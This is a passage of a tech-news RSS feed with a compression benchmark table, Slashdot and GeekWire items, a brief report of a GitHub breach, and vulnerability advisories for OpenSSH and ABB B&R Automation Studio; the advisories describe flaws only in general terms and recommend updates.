 https://lwn.net/Articles/423541/</li>

<li>

<a href="https://en.wikipedia.org/wiki/Zstd" rel="noopener noreferrer" target="_blank">
zstd</a>
 https://en.wikipedia.org/wiki/Zstd</li>

</ol>

<p>

<strong>
Appendix</strong>

</p>

<p>
The table below demonstrates the results of compressing different types of data using tools described in this episode. While not totally rigorous, I did run each compression and decompression multiple times to ensure I was getting consistent results. The laptop I used has an Intel Core i5-6200U CPU running at 2.30GHz, and the system had at least 5 GB of free memory for each run. While this processor has two cores and can run four simultaneous threads, all utilities were run single-threaded.</p>

<p>
The term "best" means the highest level of compression available (the exact level used is shown). For <code>
bzip2</code>
, the default <em>
is</em>
 the best. For <code>
zstd</code>
, "best" is -19, which is the highest "normal" level, but "ultra" levels that are even higher also exist. Ratios are the percentage of the original size that the file was reduced to (other sources might instead express the compression ratio as the <em>
reduction</em>
 in size achieved). In all results, smaller numbers are better.</p>

<pre data-language="plain">
┌────────────────────────────┬─────────────┬─────────────┬─────────────┬─────────────┬─────────────┬─────────────┬─────────────┐
│                            │    gzip     │    gzip     │    bzip2    │     xz      │     xz      │    zstd     │    zstd     │
│                            │(default -6) │  (best -9)  │    (-9)     │(default -6) │  (best -9)  │(default -3) │ (best -19)  │
├──────────────┬─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┤
│              │Size (ratio) │ 22,036,508  │ 21,891,623  │ 15,795,698  │ 13,487,768  │ 12,938,464  │ 20,454,657  │ 13,709,078  │
│              │             │ (24%)       │ (24%)       │ (17%)       │ (15%)       │ (14%)       │ (23%)       │ (15%)       │
│English Text  ├─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┤
│(90,532,092   │Compression  │ 4.8s        │ 7.6s        │ 8.5s        │ 49.8s       │ 58.8s       │ 0.6s        │ 65.2s       │
│bytes         │time         │             │             │             │             │             │             │             │
│uncompressed) ├─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┤
│              │Decompression│ 0.7s        │ 0.8s        │ 3.7s        │ 1.2s        │ 1.2s        │ 0.4s        │ 0.4s        │
│              │time         │             │             │             │             │             │             │             │
├──────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┤
│              │Size (ratio) │ 125,291,122 │ 124,189,544 │ 98,016,512  │ 84,882,492  │ 81,954,344  │ 120,604,855 │ 87,298,645  │
│              │             │ (21%)       │ (21%)       │ (17%)       │ (14%)       │ (14%)       │ (20%)       │ (15%)       │
│Source Code   ├─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┤
│(590,008,320  │Compression  │ 22.0s       │ 39.3s       │ 54.8s       │ 241s        │ 298s        │ 3.7s        │ 348s        │
│bytes         │time         │             │             │             │             │             │             │             │
│uncompressed) ├─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┤
│              │Decompression│ 5.1s        │ 5.1s        │ 20.3s       │ 8.1s        │ 7.8s        │ 2.4s        │ 2.4s        │
│              │time         │             │             │             │             │             │             │             │
├──────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┤
│              │Size (ratio) │ 32,830,905  │ 32,371,241  │ 26,856,579  │ 20,717,288  │ 20,352,880  │ 28,538,810  │ 23,154,582  │
│              │             │ (19%)       │ (19%)       │ (16%)       │ (12%)       │ (12%)       │ (17%)       │ (13%)       │
│Binary Program├─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┤
│(171,972,264  │Compression  │ 6.4s        │ 22.4s       │ 18.6s       │ 62.2s       │ 67.8s       │ 0.8s        │ 111s        │
│bytes         │time         │             │             │             │             │             │             │             │
│uncompressed) ├─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┤
│              │Decompression│ 1.5s        │ 1.5s        │ 5.6s        │ 2.3s        │ 2.3s        │ 0.7s        │ 0.7s        │
│              │time         │             │             │             │             │             │             │             │
├──────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┤
│              │Size (ratio) │ 146,397,772 │ 146,397,757 │ 144,485,451 │ 131,950,232 │ 130,926,780 │ 147,154,979 │ 145,703,840 │
│              │             │ (89%)       │ (89%)       │ (88%)       │ (80%)       │ (80%)       │ (90%)       │ (89%)       │
│WAVE Audio    ├─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┤
│(164,396,302  │Compression  │ 9.2s        │ 9.2s        │ 25.1s       │ 70.4s       │ 97.7s       │ 0.7s        │ 58.3s       │
│bytes         │time         │             │             │             │             │             │             │             │
│uncompressed) ├─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┤
│              │Decompression│ 2.0s        │ 2.0s        │ 13.5s       │ 12.2s       │ 12.1s       │ 0.6s        │ 0.8s        │
│              │time         │             │             │             │             │             │             │             │
├──────────────┴─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┼─────────────┤
│                            │     gzip    │    gzip     │    bzip2    │     xz      │     xz      │    zstd     │    zstd     │
│                            │(default -6) │  (best -9)  │    (-9)     │(default -6) │  (best -9)  │(default -3) │ (best -19)  │
└────────────────────────────┴─────────────┴─────────────┴─────────────┴─────────────┴─────────────┴─────────────┴─────────────┘
</pre>

<ul>

<li>
English text consists of Titles 1 through 10 of the 2020 U.S. <em>
Code of Federal Regulations</em>
.</li>

<li>
Source code consists of a <code>
tar</code>
 file containing the Linux kernel source, version 4.0.</li>

<li>
Binary program consists of an ELF-format executable of the <code>
pandoc</code>
 application, version 2.17.1.1 found on Debian 12.</li>

<li>
Audio consists of a 24-bit Signed Integer PCM WAVE file with 2 channels at 44.1kHz, about 10:21 in length. For comparison, the audio-specific <code>
flac</code>
 lossless compression utility reduced this file to 97,962,711 bytes (60%) in 2.6 seconds at the default (-5) level and to 97,714,876 bytes (59%) in 5.4 seconds at the highest (-8) level.</li>

</ul>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4647/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Week in Review: Most popular stories on GeekWire for the week of May 17, 2026]]></title>
<description><![CDATA[See the technology stories that people were reading on GeekWire for the week of May 17, 2026. Read More]]></description>
<link>https://tsecurity.de/de/3543819/it-nachrichten/week-in-review-most-popular-stories-on-geekwire-for-the-week-of-may-17-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3543819/it-nachrichten/week-in-review-most-popular-stories-on-geekwire-for-the-week-of-may-17-2026/</guid>
<pubDate>Sun, 24 May 2026 17:32:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1200" height="630" src="https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1.png" class="webfeedsFeaturedVisual wp-post-image" alt="GeekWire Week in Review" decoding="async" fetchpriority="high" srcset="https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1.png 1200w, https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1-620x326.png 620w" sizes="(max-width: 1200px) 100vw, 1200px"><br>See the technology stories that people were reading on GeekWire for the week of May 17, 2026. <a href="https://www.geekwire.com/2026/geekwire-weekly-roundup-2026-05-17/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Lenovo, Dell, and HP Financially Support Linux Vendor Firmware Service]]></title>
<description><![CDATA[The It's FOSS blog has news about the Linux Vendor Firmware Service, which gives hardware vendors a secure portal to upload firmware updates "which can then be downloaded and installed by users through clients such as GNOME Software or fwupdmgr." (Originally developed in 2015 by GNOME maintainer ...]]></description>
<link>https://tsecurity.de/de/3543731/linux-tipps/lenovo-dell-and-hp-financially-support-linux-vendor-firmware-service/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3543731/linux-tipps/lenovo-dell-and-hp-financially-support-linux-vendor-firmware-service/</guid>
<pubDate>Sun, 24 May 2026 16:38:23 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The It's FOSS blog has news about the Linux Vendor Firmware Service, which gives hardware vendors a secure portal to upload firmware updates "which can then be downloaded and installed by users through clients such as GNOME Software or fwupdmgr." (Originally developed in 2015 by GNOME maintainer Richard Hughes...)
The issue, however, obviously, had been funding with the largest contributors being the usual suspects, Framework and Open Source Framework Foundation, at $10K a year. Recently, however, Lenovo and Dell joined suite as Premier sponsors, which is the highest tier at $100K a year each, making the project more sustainable and manageable. 

These companies contributing makes a lot of sense, considering they are two of the bigger computer companies which offer Linux by default in some cases, especially with Lenovo's ThinkPads being the Linux users' favorite for decades. And now... HP has followed suit as a Premier sponsor, also providing $100K a year, right alongside Dell and Lenovo... 

The question still remains, however, where are the other vendors? What are they waiting for... This major move by these three companies should not only be seen as a sign of relief and wider acceptance of the usage of Linux, but as a beacon for other vendors to follow, who ought to make their hardware more accessible to the open-source community.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Lenovo%2C+Dell%2C+and+HP+Financially+Support+Linux+Vendor+Firmware+Service%3A+https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F05%2F24%2F0522202%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F05%2F24%2F0522202%2Flenovo-dell-and-hp-financially-support-linux-vendor-firmware-service%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://linux.slashdot.org/story/26/05/24/0522202/lenovo-dell-and-hp-financially-support-linux-vendor-firmware-service?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Researchers Say the Worst Climate Future is Less Likely. But the Best One is Also Slipping Away]]></title>
<description><![CDATA[Citing new research, the Associated Press reports that "modest gains in the fight to curb climate change have dialed back the most catastrophic of future heating." 
That's the good news. But the same research "also confirmed that there's no chance to limit warming to the international goal set in...]]></description>
<link>https://tsecurity.de/de/3542294/it-security-nachrichten/researchers-say-the-worst-climate-future-is-less-likely-but-the-best-one-is-also-slipping-away/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3542294/it-security-nachrichten/researchers-say-the-worst-climate-future-is-less-likely-but-the-best-one-is-also-slipping-away/</guid>
<pubDate>Sat, 23 May 2026 18:52:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Citing new research, the Associated Press reports that "modest gains in the fight to curb climate change have dialed back the most catastrophic of future heating." 
That's the good news. But the same research "also confirmed that there's no chance to limit warming to the international goal set in 2015."

Researchers' new list of seven plausible carbon pollution scenarios for the future are pushing aside two staples of climate policy: the extremes on either end. The extremes have become less probable in the past several years because of how we power our world. Carbon dioxide, released from the burning of gas, oil and coal, is chiefly responsible for warming. Increasing use of green energies, like solar, wind and geothermal, which don't emit carbon dioxide, have lowered top end carbon pollution projections. However, because those changes haven't been fast enough, the bottom end projections have risen. 

The Paris climate agreement in 2015 set a goal of limiting warming to 1.5 degrees Celsius (2.7 degrees Fahrenheit) since pre-industrial times, or the mid-1800s, giving rise to the mantra "1.5 to stay alive," but now scientists say that even their best case scenario still shoots past that signature temperature mark. On the other end, those same new scenarios no longer include the coal-heavy future that would lead to 4.5 degrees Celsius (8.1 degrees Fahrenheit) of warming by 2100, a scary scenario that many scientific studies used in their future projections. 
The new proposed worst case scenario has an end-of-the-century warming of about 3.5 degrees Celsius (6.3 degrees Fahrenheit), a full degree (1.8 degrees Fahrenheit) less than the old scenario, while the updated best case future is a couple tenths of a degree Celsius (0.36 degrees Fahrenheit) warmer than previously theorized, squeezing past the Paris goal, said climate scientist Detlef Van Vuuren of Utrecht University, lead author of a recent study laying out future scenarios. "There is kind of a narrowing of the futures. It cannot be as bad as we thought, but it cannot be as good as we hoped," said Johan Rockström, director of the Potsdam Institute for Climate Impact Research in Germany. 

The scenarios include a "middle" one where by the end of the century the world warms 3 degrees Celsius (5.4 degrees Fahrenheit) above pre-industrial times, which is roughly the path society is currently on, scientists said... Because carbon pollution keeps rising globally and stays in the atmosphere for about century, the best case scenario is for warming to shoot past the 1.5 degree mark, peak at 1.7 degrees Celsius (3.1 degrees Fahrenheit) for maybe as long as 70 years, and eventually somehow come back down below 1.5 degrees if a technology can be designed to remove massive amounts of carbon from the air, said nine of the 10 scientists interviewed for this article. The world is warming at a pace of a tenth of a degree Celsius (nearly 0.2 degrees Fahrenheit) every five years, they said.
<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Researchers+Say+the+Worst+Climate+Future+is+Less+Likely.+But+the+Best+One+is+Also+Slipping+Away%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F05%2F23%2F0320215%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F05%2F23%2F0320215%2Fresearchers-say-the-worst-climate-future-is-less-likely-but-the-best-one-is-also-slipping-away%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/05/23/0320215/researchers-say-the-worst-climate-future-is-less-likely-but-the-best-one-is-also-slipping-away?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TeamPCP hackt GitHub über kompromittierte VS-Code-Extension – Kundendaten bleiben unberührt]]></title>
<description><![CDATA[SAN FRANCISCO / LONDON (IT BOLTWISE) – GitHub bestätigt einen gezielten Sicherheitsvorfall: Angreifer konnten über eine bösartige VS-Code-Erweiterung auf interne Code-Repositories zugreifen. Laut Plattform soll es bei internen Artefakten geblieben sein; Kundendaten seien nicht betroffen. TeamPCP,...]]></description>
<link>https://tsecurity.de/de/3541512/it-security-nachrichten/teampcp-hackt-github-ueber-kompromittierte-vs-code-extension-kundendaten-bleiben-unberuehrt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3541512/it-security-nachrichten/teampcp-hackt-github-ueber-kompromittierte-vs-code-extension-kundendaten-bleiben-unberuehrt/</guid>
<pubDate>Sat, 23 May 2026 09:52:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-github-teamcp-hack-vscode-extension.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-github-teamcp-hack-vscode-extension.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-github-teamcp-hack-vscode-extension-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-github-teamcp-hack-vscode-extension-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-github-teamcp-hack-vscode-extension-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-github-teamcp-hack-vscode-extension-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-github-teamcp-hack-vscode-extension-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">SAN FRANCISCO / LONDON (IT BOLTWISE) – GitHub bestätigt einen gezielten Sicherheitsvorfall: Angreifer konnten über eine bösartige VS-Code-Erweiterung auf interne Code-Repositories zugreifen. Laut Plattform soll es bei internen Artefakten geblieben sein; Kundendaten seien nicht betroffen. TeamPCP, eine spezialisierte Gruppe für Supply-Chain-Angriffe, nutzt dabei den Diebstahl von Quellcode als Druckmittel und droht mit Leaks. GitHub hat […]</p>
<div><a href="https://www.it-boltwise.de/teampcp-hackt-github-ueber-kompromittierte-vs-code-extension-kundendaten-bleiben-unberuehrt.html">... den vollständigen Artikel <strong>»TeamPCP hackt GitHub über kompromittierte VS-Code-Extension – Kundendaten bleiben unberührt«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/teampcp-hackt-github-ueber-kompromittierte-vs-code-extension-kundendaten-bleiben-unberuehrt.html">TeamPCP hackt GitHub über kompromittierte VS-Code-Extension – Kundendaten bleiben unberührt</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-8325 | OpenSSH up to 7.2p2 session.c do_setup_env LD_PRELOAD access control (RHSA-2016:2588 / Nessus ID 91413)]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in OpenSSH up to 7.2p2. Affected by this vulnerability is the function do_setup_env of the file session.c. Performing a manipulation of the argument LD_PRELOAD as part of Environment Variable results in improper access controls.

This vulne...]]></description>
<link>https://tsecurity.de/de/3540404/sicherheitsluecken/cve-2015-8325-openssh-up-to-72p2-sessionc-dosetupenv-ldpreload-access-control-rhsa-20162588-nessus-id-91413/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3540404/sicherheitsluecken/cve-2015-8325-openssh-up-to-72p2-sessionc-dosetupenv-ldpreload-access-control-rhsa-20162588-nessus-id-91413/</guid>
<pubDate>Fri, 22 May 2026 19:39:49 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/openssh">OpenSSH up to 7.2p2</a>. Affected by this vulnerability is the function <code>do_setup_env</code> of the file <em>session.c</em>. Performing a manipulation of the argument <em>LD_PRELOAD</em> as part of <em>Environment Variable</em> results in improper access controls.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2015-8325">CVE-2015-8325</a>. The attack is only possible with local access. There is not any exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[ABB B&R Automation Studio]]></title>
<description><![CDATA[View CSAF
Summary
ABB became aware of vulnerability in the product versions listed as affected in the advisory. An update is available that replaces an outdated third-party component. Although no successful exploitation was observed during testing of the affected B&R products, the identified vuln...]]></description>
<link>https://tsecurity.de/de/3537201/it-security-nachrichten/abb-br-automation-studio/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3537201/it-security-nachrichten/abb-br-automation-studio/</guid>
<pubDate>Thu, 21 May 2026 18:39:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-141-03.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>ABB became aware of vulnerability in the product versions listed as affected in the advisory. An update is available that replaces an outdated third-party component. Although no successful exploitation was observed during testing of the affected B&amp;R products, the identified vulnerabilities could present potential attack vectors that might enable unauthorized access, data exposure, or remote code execution.</strong></p>
<p>The following versions of ABB B&amp;R Automation Studio are affected:</p>
<ul>
<li>B&amp;R Automation Studio &lt;6.5, 6.5 (CVE-2025-6965, CVE-2025-3277, CVE-2023-7104, CVE-2022-35737, CVE-2020-15358, CVE-2020-13632, CVE-2020-13631, CVE-2020-13630, CVE-2020-13435, CVE-2020-13434, CVE-2020-11656, CVE-2020-11655, CVE-2019-19646, CVE-2019-19645, CVE-2019-8457, CVE-2018-20506, CVE-2018-20505, CVE-2018-20346, CVE-2018-8740, CVE-2017-10989, CVE-2016-6153, CVE-2015-6607, CVE-2015-5895, CVE-2015-3717, CVE-2015-3416)</li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 9.8</td>
<td>ABB</td>
<td>ABB B&amp;R Automation Studio</td>
<td>Numeric Truncation Error, Heap-based Buffer Overflow, Improper Restriction of Operations within the Bounds of a Memory Buffer, Out-of-bounds Write, NULL Pointer Dereference, Incorrect User Management, Use After Free, Integer Overflow or Wraparound, Improper Check for Unusual or Exceptional Conditions, Uncontrolled Recursion, Out-of-bounds Read, Improper Input Validation, Exposure of Sensitive Information to an Unauthorized Actor, Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Energy</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>Switzerland</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-6965</a></h3>
<div class="csaf-accordion-content">
<p>There exists a vulnerability in SQLite versions before 3.50.2 where the number of aggregate terms could exceed the number of columns available. This could lead to a memory corruption issue.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-6965">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/197.html">CWE-197 Numeric Truncation Error</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-3277</a></h3>
<div class="csaf-accordion-content">
<p>An integer overflow vulnerability exists in SQLite's concat_ws() function that can lead to a massive heap buffer overflow. When triggered, the integer overflow results in a truncated size value being used for buffer allocation, while the original untruncated size is used for writing the resulting string, causing a heap buffer overflow of approximately 4GB.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-3277">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/122.html">CWE-122 Heap-based Buffer Overflow</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-7104</a></h3>
<div class="csaf-accordion-content">
<p>A vulnerability was found in SQLite SQLite3 up to 3.43.0 and classified as critical. This issue affects the function sessionReadRecord of the file ext/session/sqlite3session.c of the component make alltest Handler. The manipulation leads to heap-based buffer overflow.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-7104">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/122.html">CWE-122 Heap-based Buffer Overflow</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.3</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-35737</a></h3>
<div class="csaf-accordion-content">
<p>SQLite 1.0.12 through 3.39.x before 3.39.2 sometimes allows an array-bounds overflow if billions of bytes are used in a string argument to a C API.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-35737">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/119.html">CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
